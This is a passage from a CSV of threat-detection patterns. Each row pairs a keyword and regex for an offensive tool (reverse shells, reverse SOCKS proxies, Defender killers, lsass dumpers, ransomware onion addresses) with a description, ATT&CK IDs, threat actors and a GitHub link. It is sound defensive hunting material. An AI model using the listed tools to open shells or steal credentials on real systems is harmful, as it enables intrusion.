T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","57242" "*ReverseShell.ps1*",".{0,1000}ReverseShell\.ps1.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","N/A","9","861","190","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z","57243" "*ReverseShell_20*.ps1*",".{0,1000}ReverseShell_20.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV 
Bypass) Framework. A list of useful Powershell scripts with 100% AV bypass ratio","T1112 - T1562.001 - T1086 - T1548.002 - T1059.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","N/A","10","1104","174","2025-01-28T10:47:44Z","2021-10-08T17:36:24Z","57244" "*ReverseSock5Proxy/releases/download/*",".{0,1000}ReverseSock5Proxy\/releases\/download\/.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","1","N/A","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","57245" "*ReverseSocksProxyHandler.py*",".{0,1000}ReverseSocksProxyHandler\.py.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","57246" "*reverse-ssh *@*",".{0,1000}reverse\-ssh\s.{0,1000}\@.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","57247" "*reverse-ssh -p*",".{0,1000}reverse\-ssh\s\-p.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 
","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","57248" "*reverse-ssh -v*",".{0,1000}reverse\-ssh\s\-v.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","57249" "*reverse-ssh.exe*",".{0,1000}reverse\-ssh\.exe.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","57250" "*reverse-ssh/releases/latest*",".{0,1000}reverse\-ssh\/releases\/latest.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","57251" "*reverse-sshx64.exe*",".{0,1000}reverse\-sshx64\.exe.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","57252" "*reverse-sshx86.exe*",".{0,1000}reverse\-sshx86\.exe.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh 
server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","57253" "*ReverseTCP.ps1*",".{0,1000}ReverseTCP\.ps1.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","1","N/A","N/A","10","10","1053","216","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z","57254" "*ReverseTCPShell-main*",".{0,1000}ReverseTCPShell\-main.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","1","N/A","N/A","10","10","1053","216","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z","57255" "*ReversingID/Shellcode-Loader*",".{0,1000}ReversingID\/Shellcode\-Loader.{0,1000}","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","N/A","10","3","244","44","2025-01-25T16:30:56Z","2021-08-08T08:53:03Z","57256" "*reverst *--tunnel-address *",".{0,1000}reverst\s.{0,1000}\-\-tunnel\-address\s.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","57257" "*REVERST_CERTIFICATE_PATH*",".{0,1000}REVERST_CERTIFICATE_PATH.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - 
TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","57258" "*REVERST_LOG*",".{0,1000}REVERST_LOG.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","57259" "*REVERST_PRIVATE_KEY_PATH*",".{0,1000}REVERST_PRIVATE_KEY_PATH.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","57260" "*REVERST_SERVER_NAME*",".{0,1000}REVERST_SERVER_NAME.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","57261" "*REVERST_TUNNEL_ADDRESS*",".{0,1000}REVERST_TUNNEL_ADDRESS.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","57262" "*REVERST_TUNNEL_GROUPS*",".{0,1000}REVERST_TUNNEL_GROUPS.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","57263" "*RevertToSelf was 
successful*",".{0,1000}RevertToSelf\swas\ssuccessful.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","57264" "*Revoke-Obfuscation*",".{0,1000}Revoke\-Obfuscation.{0,1000}","offensive_tool_keyword","Invoke-DOSfuscation","Revoke-Obfuscation is a PowerShell v3.0+ compatible PowerShell obfuscation detection framework. 
used for deobfuscating PowerShell scripts","T1027 - T1083 - T1059","TA0002 - TA0007 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Revoke-Obfuscation","1","1","N/A","N/A","N/A","8","735","123","2023-12-01T02:04:51Z","2017-07-11T01:20:48Z","57265" "*revsockaddr.sin_addr.s_addr = inet_addr(*",".{0,1000}revsockaddr\.sin_addr\.s_addr\s\=\sinet_addr\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57266" "*revsocks - reverse socks5 server/client*",".{0,1000}revsocks\s\-\sreverse\ssocks5\sserver\/client.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","0","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57267" "*revsocks -connect*",".{0,1000}revsocks\s\-connect.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","0","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57268" "*revsocks -dns*",".{0,1000}revsocks\s\-dns.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","0","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57269" "*revsocks -listen*",".{0,1000}revsocks\s\-listen.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - 
TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","0","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57270" "*revsocks_darwin_amd64*",".{0,1000}revsocks_darwin_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","#linux","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57271" "*revsocks_freebsd_386*",".{0,1000}revsocks_freebsd_386.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57272" "*revsocks_freebsd_amd64*",".{0,1000}revsocks_freebsd_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57273" "*revsocks_freebsd_arm*",".{0,1000}revsocks_freebsd_arm.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57274" "*revsocks_linux_386*",".{0,1000}revsocks_linux_386.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","#linux","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57275" 
"*revsocks_linux_amd64*",".{0,1000}revsocks_linux_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","#linux","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57276" "*revsocks_linux_arm*",".{0,1000}revsocks_linux_arm.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","#linux","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57277" "*revsocks_linux_mips*",".{0,1000}revsocks_linux_mips.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","#linux","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57278" "*revsocks_linux_mipsle*",".{0,1000}revsocks_linux_mipsle.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","#linux","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57279" "*revsocks_linux_s390x*",".{0,1000}revsocks_linux_s390x.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","#linux","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57280" "*revsocks_netbsd_386*",".{0,1000}revsocks_netbsd_386.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - 
TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57281" "*revsocks_netbsd_amd64*",".{0,1000}revsocks_netbsd_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57282" "*revsocks_netbsd_arm*",".{0,1000}revsocks_netbsd_arm.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57283" "*revsocks_openbsd_386*",".{0,1000}revsocks_openbsd_386.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57284" "*revsocks_openbsd_amd64*",".{0,1000}revsocks_openbsd_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57285" "*revsocks_windows_386.exe*",".{0,1000}revsocks_windows_386\.exe.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57286" 
"*revsocks_windows_amd64.exe*",".{0,1000}revsocks_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57287" "*revsocksserver.h*",".{0,1000}revsocksserver\.h.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/emilarner/revsocks","1","0","N/A","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","31","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z","57288" "*revTCPclient.ps1*",".{0,1000}revTCPclient\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","57289" "*RevTcpShell.exe*",".{0,1000}RevTcpShell\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - 
T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","57290" "*RevWinDefKiller.exe*",".{0,1000}RevWinDefKiller\.exe.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","N/A","10","5","448","67","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z","57291" "*rgleaktxuey67yrgspmhvtnrqtgogur35lwdrup4d3igtbm3pupc4lyd.onion*",".{0,1000}rgleaktxuey67yrgspmhvtnrqtgogur35lwdrup4d3igtbm3pupc4lyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57293" "*RhinoSecurityLabs*",".{0,1000}RhinoSecurityLabs.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting exploitation tools for pentesters","N/A","N/A","N/A","N/A","Exploitation tool","https://github.com/RhinoSecurityLabs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","57294" "*RhinoSecurityLabs/pacu*",".{0,1000}RhinoSecurityLabs\/pacu.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","57295" "*-Rhost * -Port * -Cmd *cmd 
/c*",".{0,1000}\-Rhost\s.{0,1000}\s\-Port\s.{0,1000}\s\-Cmd\s.{0,1000}cmd\s\/c.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Exploit-Jenkins.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","57296" "*rhosts_walker_spec.rb*",".{0,1000}rhosts_walker_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a 
widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57297" "*RHVtcENyZWRz*",".{0,1000}RHVtcENyZWRz.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57298" "*RHVtcENyZWRz*",".{0,1000}RHVtcENyZWRz.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - 
T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57299" "*rhysidafohrhyy2aszi7bm32tnjat5xri65fopcxkdfxhi4tidsg7cad.onion*",".{0,1000}rhysidafohrhyy2aszi7bm32tnjat5xri65fopcxkdfxhi4tidsg7cad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57300" "*ricardojoserf/adfsbrute*",".{0,1000}ricardojoserf\/adfsbrute.{0,1000}","offensive_tool_keyword","adfsbrute","test credentials against Active Directory Federation Services (ADFS) allowing password spraying or bruteforce attacks","T1110.003 - T1110.001 - T1110","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ricardojoserf/adfsbrute","1","1","N/A","N/A","8","2","172","33","2021-04-23T16:43:59Z","2020-10-02T16:28:35Z","57301" "*ricardojoserf/NativeBypassCredGuard*",".{0,1000}ricardojoserf\/NativeBypassCredGuard.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","1","N/A","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","57302" "*ricardojoserf/NativeDump*",".{0,1000}ricardojoserf\/NativeDump.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential 
